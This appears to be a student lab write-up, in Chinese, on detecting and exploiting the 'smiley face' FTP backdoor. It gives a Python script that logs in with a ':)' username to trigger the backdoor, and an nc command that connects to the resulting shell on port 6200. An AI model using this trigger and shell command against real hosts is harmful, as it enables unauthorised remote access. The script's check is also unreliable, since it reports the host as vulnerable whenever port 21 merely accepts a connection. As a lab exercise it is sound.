zuoye4

笑脸漏洞检测


经过查询得知python的socket库中包含网络探测所需要的函数,在代码前面导入该库



编写


先导入socket库以及FTP库


1
2
import socket
from ftplib import FTP

接下来获取输入指定目标ip


1
ip = input("检测ip:")

编写FTP连接部分

笑脸漏洞即账号名中带有:) 的时候,会打开一个开放在6200端口的后门,可以连接到靶机的shell


1
2
3
4
5
6
7
ftp = FTP()
user = "test:)"
passwd = "123"
ftp.connect(ip, 21, timeout=100)
print("成功连接 很可能存在笑脸漏洞")
response = ftp.login(user, passwd)
ftp.quit()

全部代码如下:


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import socket
from ftplib import FTP

ip = input("检测ip:")
smile_port = "6200"

try:
    ftp = FTP()
    user = "test:)"
    passwd = "123"
    ftp.connect(ip, 21, timeout=100)
    print("成功连接 很可能存在笑脸漏洞")
    response = ftp.login(user, passwd)
    ftp.quit()
except:
    print("连接失败,可能不存在笑脸漏洞")


实验



输入我的靶机ip



提示存在笑脸漏洞,使用命令 nc 靶机ip 端口

可以直接连接上对方的shell,利用成功